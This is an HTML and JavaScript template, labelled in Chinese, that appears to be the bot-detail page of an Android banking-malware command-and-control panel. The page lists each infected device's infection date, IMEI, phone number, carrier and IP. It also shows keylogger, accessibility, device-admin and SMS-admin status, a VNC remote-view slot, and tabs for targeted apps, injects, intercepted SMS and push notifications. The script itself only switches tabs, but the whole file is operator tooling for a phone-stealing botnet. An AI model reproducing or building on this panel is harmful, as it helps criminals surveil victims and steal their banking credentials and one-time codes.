<script>

function show_sms()
{
	_hide_all()
	$('#content_sms').show()
	location.hash = 'sms'
	$('#sms-li').addClass('active')
}

function show_apps()
{
	_hide_all()
	$('#content_apps').show()
	location.hash = 'apps'
	$('#apps-li').addClass('active')
}

function show_desired_apps()
{
	_hide_all()
	$('#content_desired_apps').show()
	location.hash = 'desired_apps'
	$('#desired_apps-li').addClass('active')
}

function show_injects()
{
	_hide_all()
	$('#content_injects').show()
	location.hash = 'injects'
	$('#injects-li').addClass('active')
}

function show_pushes()
{
	_hide_all()
	$('#content_pushes').show()
	location.hash = 'pushes'
	$('#pushes-li').addClass('active')
}

function _hide_all()
{
	$('#content_sms').hide()
	$('#content_apps').hide()
	$('#content_desired_apps').hide()
	$('#content_injects').hide()
	$('#content_pushes').hide()
}


function show_tab(name)
{
	$('#sms-li').removeClass('active')
	$('#apps-li').removeClass('active')
	$('#desired_apps-li').removeClass('active')
	$('#injects-li').removeClass('active')
	$('#pushes-li').removeClass('active')
	
	if(name == '#sms')
		show_sms()
	else if(name == '#apps')
		show_apps()
	else if(name == '#desired_apps')
		show_desired_apps()
	else if(name == '#injects')
		show_injects()
	else if(name == '#pushes')
		show_pushes()
}

$(document).ready(function(){
	
	if(location.hash != "")
	{
		show_tab(location.hash)
	}else{
		show_desired_apps()
	}
})

$('#comment_%BOT_BOT_ID%').on("keypress", function (e) {            

	if(e.keyCode == 13) 
	{
		save_comment_bots('%BOT_BOT_ID%')
		e.preventDefault(); 
	}
});
</script>



<div class="panel panel-default">
	<div class="panel-heading">
		<h3 class="panel-title">
			<a href='?a=admin&action=bots&bbot_id=%BOT_ID%&page=tasks'><button class='btn btn-primary btn-sm'><i class='flaticon-list' style='color: white'></i> 任务</button></a>
			设备 #%BOT_ID% <a href="?a=admin&action=bots&page=bot_page&bbot_id=%BOT_ID%"><button class="btn btn-sm btn-info"><i class="flaticon-refresh-arrow" style="color: white"></i></button></a>
			
			<span %IS_LOCKED% style="color: red; border: 1px solid red; border-radius: 5px; padding: 2px">已锁定</span>
			<!-- bot comment field -->
			
			
			

			<a style='float: right' href='?a=admin&action=bots&bbot_id=%BOT_ID%&naction=delete_bot'><button style="width: 55px" class='btn btn-sm btn-danger' onclick='return confirm("Are you sure?")' title='Delete the bot'><i class="flaticon-trash" style="color: white"></i></button></a>

<span style='float: right'>
<input type="text" id="comment_%BOT_BOT_ID%" value="%COMMENT%" placeholder="Comment"  style="margin-left: 20px; color: #555; border: 1px solid #ccc; border-radius: 30px 0 0 30px; border-right: 0; width: 300px; height: 30px; font-size: 10pt" class="input-sm" /><button type="button" style="border-left: 0; font-size: 10pt; border-radius: 0 30px 30px 0; margin-right: 20px" onclick="save_comment_bots('%BOT_BOT_ID%')" class="btn btn-info btn-sm">Save</button>
</span>
			
		</h3>
	</div>
	<div class="panel-body">
		
		<div class="row">

	<div class="col-md-12 text-center">
		%COMMANDS%
	</div>
	

		</div>
		
	<div class="row" style="margin: 20px; border: 0px solid black;">
		
		<div class="col-md-1"></div>
		<div class="col-md-1 text-center"><b>%LOCAL_TIME%</b><br />设备时间</div>
		
		<div %IS_FG% class="col-md-1 text-center"><i style='color: orange' class='flaticon-musical-bell-outline' title='防睡眠模式已启用'></i><br />防睡眠</div>
		<div class="col-md-1 text-center">%SCREEN_STATE%<br />屏幕状态</div>
		<div class="col-md-1 text-center">%IS_DEVICE_ADMIN%<br />设备管理员</div>
		<div class="col-md-1 text-center">%IS_SMS_ADMIN%<br />短信管理员</div>
		
		<div class="col-md-1 text-center">%IS_DEVICE_LOCKED%<br />设备锁定</div>
<!--
		<div class="col-md-1 text-center">%IS_LOADER_INSTALLED%<br />Loader</div>
-->
		<div class="col-md-1 text-center">%KEYLOGGER_ICON%<br />键盘记录器</div>
		
		<div class="col-md-1 text-center">%HAS_ACSB%<br />辅助功能</div>
		<div class="col-md-1 text-center">%PUSH_ADMIN%<br />推送通知</div>
		<div class="col-md-1 text-center">%ON_CHARGER%<br />电池状态</div>
		
		<div class="col-md-2"></div>
	</div>

		<div class="row">
			<div class="col-md-12">
				%VNC%
			</div>
		</div>
<br />
		<div class="row">
			<div class="col-md-12">
<table class="table table-bordered">
	
	<tr>
		<td style="text-align: left">最后在线: <span style='color: black'>%LAST_SEEN_MARKER% %LAST_SEEN_AGO%</span></td>
		
	<td style="text-align: left">
国家: <span style='color: black'>%BOT_COUNTRY%</span> <img src='%COUNTRY_FLAG_PATH%' alt='国家: %BOT_COUNTRY%'  title='国家: %BOT_COUNTRY%' />
&nbsp;&nbsp;
语言: <span style='color: black'>%BOT_LANG%</span> <img src='%LANG_FLAG_PATH%' alt='语言: %BOT_LANG%'  title='语言: %BOT_LANG%' />
	</td>
	
	<td style="text-align: left">IMEI: <span style='color: black'>%BOT_IMEI%</span></td>
	
	</tr>

	<tr>
		<td style="text-align: left">运行时间: <span style='color: black'>%UPTIME%</span></td>
		<td style="text-align: left">Android版本: <span style='color: black'>%BOT_ANDROID%</span></td>
		<td style="text-align: left">标签: <span style='color: black'>%BOT_TAG%</span></td>
	</tr>

	<tr>
		<td style="text-align: left">感染时间: <span style='color: black'>%REG_DATE%</span></td>
		<td style="text-align: left">IP地址: <span style='color: black'>%BOT_IP%</span></td>
		<td style="text-align: left">设备型号: <span style='color: black'>%BOT_MODEL%</span></td>
	</tr>
	
	<tr>
		<td style="text-align: left">电话号码: <span style='color: black'>%BOT_NUMBER%</span></td>
		<td style="text-align: left">运营商: <span style='color: black'>%BOT_OPERATOR%</span></td>
		<td style="text-align: left">当前任务: <span style='color: black'>%TASK%</span></td>
	</tr>
	
</table>

			</div>
		</div> <!-- end row -->

	</div>
</div>

<ul class="nav nav-tabs" id="myTab" role="tablist">
  <li class="nav-item" id="desired_apps-li">
    <a class="nav-link" id="desired_apps-tab" data-toggle="tab" href="javascript:show_tab('#desired_apps');undefined" role="tab" aria-controls="desired_apps"
      aria-selected="false"><i style='color: black' class='flaticon-android-character-symbol'></i> 目标应用 (%DESIRED_APPS_SZ%)</a>
  </li>
  <li class="nav-item" id="apps-li">
    <a class="nav-link" id="apps-tab" data-toggle="tab" href="javascript:show_tab('#apps');undefined" role="tab" aria-controls="apps"
      aria-selected="false"><i style='color: black' class='flaticon-android-character-symbol'></i> 已安装应用 (%APPS_SZ%)</a>
  </li>
  <li class="nav-item" id="injects-li">
    <a class="nav-link" id="injects-tab" data-toggle="tab" href="javascript:show_tab('#injects');undefined" role="tab" aria-controls="injects"
      aria-selected="false"><i style='color: black' class='flaticon-paper-bill'></i> 注入 (%INJECTS_SZ%)</a>
  </li>
  <li class="nav-item" id="sms-li">
    <a class="nav-link" id="sms-tab" data-toggle="tab" href="javascript:show_tab('#sms');undefined" role="tab" aria-controls="sms"
      aria-selected="false"><i style='color: black' class='flaticon-envelope'></i> 短信 (%SMS_SZ%)</a>
  </li>
  <li class="nav-item" id="pushes-li">
    <a class="nav-link" id="pushes-tab" data-toggle="tab" href="javascript:show_tab('#pushes');undefined" role="tab" aria-controls="pushes"
      aria-selected="false"><i style='color: black' class='flaticon-notification'></i> 推送通知</a>
  </li>
</ul>

<div class="tab-content" id="myTabContent" style="border: 1px solid #eee; padding: 20px; background-color: #eee">
    <div class="tab-pane active" id="content_desired_apps" role="tabpanel" aria-labelledby="desired_apps-tab">%CONTENT_DESIRED_APPS%</div>
  <div class="tab-pane" id="content_sms" role="tabpanel" aria-labelledby="sms-tab">%CONTENT_SMS%</div>
  <div class="tab-pane" id="content_apps" role="tabpanel" aria-labelledby="apps-tab">%CONTENT_APPS%</div>
  <div class="tab-pane" id="content_injects" role="tabpanel" aria-labelledby="injects-tab">%CONTENT_INJECTS%</div>
  <div class="tab-pane" id="content_pushes" role="tabpanel" aria-labelledby="pushes-tab">%CONTENT_PUSHES%</div>
</div>
<br />
<br />
<br />
<br />
<br />
<br />
